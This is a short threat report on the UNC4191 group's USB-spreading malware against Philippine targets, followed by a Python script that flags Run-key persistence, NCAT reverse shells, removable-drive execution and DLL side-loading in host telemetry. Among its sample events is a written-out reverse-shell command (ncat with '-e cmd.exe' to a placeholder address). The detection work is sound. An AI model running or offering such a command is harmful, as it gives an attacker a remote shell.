UNC4191 Threat Group Targets Entities In The Philippines

December 1, 2022

The UNC4191 threat group was discovered targeting entities in the Philippines with custom malware and the NCAT command-line networking utility. The malicious software is written in C/C++, replicates by infecting new removable drives, and creates a reverse shell to the actor's command and control server. Registry Run keys are used for persistence while multiple legitimate binaries are leveraged for DLL Side-Loading.
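The four behaviours named above (removable-drive execution, an NCAT shell, Run-key persistence, DLL side-loading) can be triaged per host from endpoint telemetry. The following is an added example, not code or indicators from the report: the simplified event fields, the assumption that only `C:` is a fixed disk, and every sample event are constructed for illustration.

```python
import ntpath
from collections import defaultdict

SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
FIXED_DRIVES = {"c:"}  # assumption: only C: is a fixed disk on these hosts

def in_system_dir(path):
    return path.lower().lstrip('"').startswith(SYSTEM_DIRS)

def classify(ev):
    """Return the behaviour label an event matches, or None."""
    kind = ev["type"]
    if kind == "registry_set":  # Run/RunOnce value pointing outside system directories
        if "\\currentversion\\run" in ev["key"].lower() and not in_system_dir(ev["data"]):
            return "run_key_persistence"
    elif kind == "process_create":
        image = ev["image"].lower()
        args = set(ev["cmdline"].lower().split())
        if ntpath.basename(image) == "ncat.exe" and args & {"-e", "--exec", "-c", "--sh-exec"}:
            return "ncat_reverse_shell"
        if ntpath.splitdrive(image)[0] not in FIXED_DRIVES:
            return "removable_drive_exec"
    elif kind == "image_load":  # unsigned DLL loaded from the executable's own folder
        same_dir = ntpath.dirname(ev["image"]).lower() == ntpath.dirname(ev["dll"]).lower()
        if same_dir and not ev["dll_signed"] and not in_system_dir(ev["dll"]):
            return "dll_side_load_candidate"
    return None

def triage(events, threshold=2):
    """Map host -> sorted behaviours, for hosts showing >= threshold distinct ones."""
    seen = defaultdict(set)
    for ev in events:
        label = classify(ev)
        if label:
            seen[ev["host"]].add(label)
    return {h: sorted(b) for h, b in seen.items() if len(b) >= threshold}

# Constructed sample events (hypothetical hosts, paths and address; not from the report).
SAMPLE = [
    {"host": "WS01", "type": "registry_set", "key": r"HKU\S-1-5-21-0\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "data": r'"C:\Users\Public\app\viewer.exe"'},
    {"host": "WS01", "type": "image_load", "image": r"C:\Users\Public\app\viewer.exe", "dll": r"C:\Users\Public\app\helper.dll", "dll_signed": False},
    {"host": "WS01", "type": "process_create", "image": r"C:\Users\Public\app\ncat.exe", "cmdline": "ncat.exe 203.0.113.10 443 -e cmd.exe"},
    {"host": "WS02", "type": "process_create", "image": r"E:\docs\viewer.exe", "cmdline": "viewer.exe"},
    {"host": "WS03", "type": "registry_set", "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive", "data": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Requiring two or more distinct behaviours on one host keeps a single noisy rule, such as any program run from a USB drive, from raising an alert on its own.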